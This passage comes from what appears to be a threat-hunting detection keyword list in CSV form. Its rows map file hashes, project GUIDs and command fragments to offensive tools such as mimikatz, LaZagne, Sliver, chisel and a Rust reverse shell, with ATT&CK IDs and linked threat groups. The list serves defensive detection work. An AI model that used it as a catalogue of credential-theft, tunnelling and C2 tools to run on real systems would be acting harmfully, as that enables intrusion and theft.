open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","21555" 
"*0c94f85cb61c62e3f2124ea95d74c5fbd2901751d3536c23b36631ba800d628d*",".{0,1000}0c94f85cb61c62e3f2124ea95d74c5fbd2901751d3536c23b36631ba800d628d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21556" "*0c96f88dbaccc1386890569356cf4ad5f45bbc49824ee7578dd56fa677460cbd*",".{0,1000}0c96f88dbaccc1386890569356cf4ad5f45bbc49824ee7578dd56fa677460cbd.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21557" "*0c9720ca9be018a435d41614f7cf66cf4aefda0c89c0fc829265315a2b0cc595*",".{0,1000}0c9720ca9be018a435d41614f7cf66cf4aefda0c89c0fc829265315a2b0cc595.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","21558" "*0c9a9c3ce08d379b81646f92d8cb90fbd3fb384e497a4388f4bc33f1c4c41a44*",".{0,1000}0c9a9c3ce08d379b81646f92d8cb90fbd3fb384e497a4388f4bc33f1c4c41a44.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux 
#filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21559" "*0c9c1d4a02cdc9cac7b19c0b055468d9c04714c00bd3df254490ecf4953c5c95*",".{0,1000}0c9c1d4a02cdc9cac7b19c0b055468d9c04714c00bd3df254490ecf4953c5c95.{0,1000}","offensive_tool_keyword","SharpCOM","DCOM Lateral Movement","T1175","TA0008","N/A","N/A","Lateral Movement","https://github.com/rvrsh3ll/SharpCOM","1","0","#filehash","N/A","10","2","128","30","2019-09-16T22:52:53Z","2018-12-13T15:10:55Z","21560" "*0c9df22b5df37a9552ab164949a14dcd9d1dbcbd90b7a5870c1ed145ea10ae16*",".{0,1000}0c9df22b5df37a9552ab164949a14dcd9d1dbcbd90b7a5870c1ed145ea10ae16.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","21561" "*0ca10134908aead6310e72aae31b7eca8e653ccfa9a2bad686cea277367e4f83*",".{0,1000}0ca10134908aead6310e72aae31b7eca8e653ccfa9a2bad686cea277367e4f83.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21563" 
"*0ca53778e8cf399b1052ba2f500881d04066525b65e8b564360e7b581ac9cf68*",".{0,1000}0ca53778e8cf399b1052ba2f500881d04066525b65e8b564360e7b581ac9cf68.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","21564" "*0ca801fdfa8a5040b2e60608fe9ff7fc987ef7d361e389ddcc8d1568b8832230*",".{0,1000}0ca801fdfa8a5040b2e60608fe9ff7fc987ef7d361e389ddcc8d1568b8832230.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21565" "*0cb2d09cb81a09c12093fa3cd9739efe998eff21f430375a9b51ee305d8623ac*",".{0,1000}0cb2d09cb81a09c12093fa3cd9739efe998eff21f430375a9b51ee305d8623ac.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","21566" 
"*0cb5af2ee5239ef9d399446af3088fd26fff2e012b9f8b7e7e59569c8d7d6369*",".{0,1000}0cb5af2ee5239ef9d399446af3088fd26fff2e012b9f8b7e7e59569c8d7d6369.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21567" "*0cb637ff999fdec518a1792b5d98d6ffbd9eb65ebb828950bf9fd488d351e190*",".{0,1000}0cb637ff999fdec518a1792b5d98d6ffbd9eb65ebb828950bf9fd488d351e190.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","21568" "*0cb85b94cf22a5eb8c6a391c9546aeeb1d86b7e7ae482b512de0f45c3ed90f26*",".{0,1000}0cb85b94cf22a5eb8c6a391c9546aeeb1d86b7e7ae482b512de0f45c3ed90f26.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","21569" "*0cc0c88006e85595ae428127d119a86d78c6c61631478d23fdd533a547222f05*",".{0,1000}0cc0c88006e85595ae428127d119a86d78c6c61631478d23fdd533a547222f05.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","21573" "*0CC923FB-E1FD-456B-9FE4-9EBA5A3DC2FC*",".{0,1000}0CC923FB\-E1FD\-456B\-9FE4\-9EBA5A3DC2FC.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#GUIDproject","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","21574" "*0CD16C7B-2A65-44E5-AB74-843BD23241D3*",".{0,1000}0CD16C7B\-2A65\-44E5\-AB74\-843BD23241D3.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare 
exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/outflanknl/PrintNightmare","1","0","#GUIDproject","N/A","10","4","337","67","2021-09-13T08:45:26Z","2021-09-13T08:44:02Z","21577" "*0cd6b6f2c8164d440a118eb546a05d54232cedd792b4e5998cd653a5f3921a40*",".{0,1000}0cd6b6f2c8164d440a118eb546a05d54232cedd792b4e5998cd653a5f3921a40.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21579" "*0cd8f2bd40fdca1eb41c8317b86b1382f1cbf57e2a7537fd731c8541132bef60*",".{0,1000}0cd8f2bd40fdca1eb41c8317b86b1382f1cbf57e2a7537fd731c8541132bef60.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","0","#filehash","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","21581" "*0cf16d4d70941be216c787a44a7401c9c9547016952a2c699579d4e4bb9c8110*",".{0,1000}0cf16d4d70941be216c787a44a7401c9c9547016952a2c699579d4e4bb9c8110.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","#filehash","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","21585" "*0cf7ec1618e87248f23674db07692a63fbd4e945102b143baa5b34d7eebb5977*",".{0,1000}0cf7ec1618e87248f23674db07692a63fbd4e945102b143baa5b34d7eebb5977.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a 
TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","21587" "*0cf8787b1bfb746c629b92dc5a471a436105e176d306a2808a636adab4df1508*",".{0,1000}0cf8787b1bfb746c629b92dc5a471a436105e176d306a2808a636adab4df1508.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","21588" "*0cf9297dc4511e2957e45524ec12f8b6e9c4873cec625daf20d27aedc0bdf5e9*",".{0,1000}0cf9297dc4511e2957e45524ec12f8b6e9c4873cec625daf20d27aedc0bdf5e9.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - 
Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","21589" "*0cf9297dc4511e2957e45524ec12f8b6e9c4873cec625daf20d27aedc0bdf5e9*",".{0,1000}0cf9297dc4511e2957e45524ec12f8b6e9c4873cec625daf20d27aedc0bdf5e9.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","21590" 
"*0cfb136f47821f46d232eb0bd3b37b652d9846c4d66646292a9418c86d1faf47*",".{0,1000}0cfb136f47821f46d232eb0bd3b37b652d9846c4d66646292a9418c86d1faf47.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","21592" "*0cffe83538d449fae070161c557a89aad53f47d7472eb22c2cfc3c2671852fa6*",".{0,1000}0cffe83538d449fae070161c557a89aad53f47d7472eb22c2cfc3c2671852fa6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21595" "*0d0b7a5276ebfefb28407800d2ba37f5102c9917cacaac5b265df55f95759b14*",".{0,1000}0d0b7a5276ebfefb28407800d2ba37f5102c9917cacaac5b265df55f95759b14.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","21601" "*0d1448c1bc3c43a7a989e251079fcd0bea32cb8864b4b00cb8c17310464fd06d*",".{0,1000}0d1448c1bc3c43a7a989e251079fcd0bea32cb8864b4b00cb8c17310464fd06d.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","21602" 
"*0D17A4B4-A7C4-49C0-99E3-B856F9F3B271*",".{0,1000}0D17A4B4\-A7C4\-49C0\-99E3\-B856F9F3B271.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","Black Basta","Defense Evasion","https://github.com/zer0condition/mhydeath","1","0","#GUIDproject","N/A","10","4","397","71","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z","21603" "*0d1a410e8085517a23da9fee226564169f767570993dcbb8f0b81b579a50e541*",".{0,1000}0d1a410e8085517a23da9fee226564169f767570993dcbb8f0b81b579a50e541.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21604" "*0d1n * --post * --payloads *",".{0,1000}0d1n\s.{0,1000}\s\-\-post\s.{0,1000}\s\-\-payloads\s.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","0","N/A","N/A","7","","N/A","","","","21605" "*0d1n --host*",".{0,1000}0d1n\s\-\-host.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","0","N/A","N/A","7","","N/A","","","","21606" "*0d1n*kill_listener.sh*",".{0,1000}0d1n.{0,1000}kill_listener\.sh.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","21607" "*0d21ae4c38549782f8b066155b671b2a356721209a5ecaa64bba6edcc6e2f97e*",".{0,1000}0d21ae4c38549782f8b066155b671b2a356721209a5ecaa64bba6edcc6e2f97e.{0,1000}","offensive_tool_keyword","SharpEdge","C# Implementation of Get-VaultCredential - Displays Windows vault credential objects including cleartext web credentials - based on https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-VaultCredential.ps1","T1555.004 - T1552.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/SharpEdge","1","0","#filehash","N/A","10","1","14","7","2018-07-31T01:31:21Z","2018-07-31T09:54:11Z","21608" "*0d2536112fc0b0960f00bf8d8b8a824dd0bcaf9b46336398edc11f2fdab63ecf*",".{0,1000}0d2536112fc0b0960f00bf8d8b8a824dd0bcaf9b46336398edc11f2fdab63ecf.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21609" "*0d2f5c4ee9f63b465776329c0ad2c94cbad788db383a0d94c0219a64d7f55d46*",".{0,1000}0d2f5c4ee9f63b465776329c0ad2c94cbad788db383a0d94c0219a64d7f55d46.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","21612" 
"*0d31a6d35d6b320f815c6ba327ccb8946d4d7f771e0dcdbf5aa8af775576f2d1*",".{0,1000}0d31a6d35d6b320f815c6ba327ccb8946d4d7f771e0dcdbf5aa8af775576f2d1.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","21613" "*0d31a6d35d6b320f815c6ba327ccb8946d4d7f771e0dcdbf5aa8af775576f2d1*",".{0,1000}0d31a6d35d6b320f815c6ba327ccb8946d4d7f771e0dcdbf5aa8af775576f2d1.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - 
Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","21614" "*0d31ab15ca76d4169ac74d4f09b7d79b762758edad0c5f23032e3a53327045ec*",".{0,1000}0d31ab15ca76d4169ac74d4f09b7d79b762758edad0c5f23032e3a53327045ec.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - T1590.005","TA0043 - TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","0","#filehash","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","21615" "*0d33356f9addc458bf9fc3861d9cafef954a51b66412b1cfc435eede351733f1*",".{0,1000}0d33356f9addc458bf9fc3861d9cafef954a51b66412b1cfc435eede351733f1.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#filehash #linux #windows","N/A","10","1","75","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z","21616" "*0d3f1696aae8472145400d6858b1c44ba7532362be5850dae2edbd4a40f36aa5*",".{0,1000}0d3f1696aae8472145400d6858b1c44ba7532362be5850dae2edbd4a40f36aa5.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). 
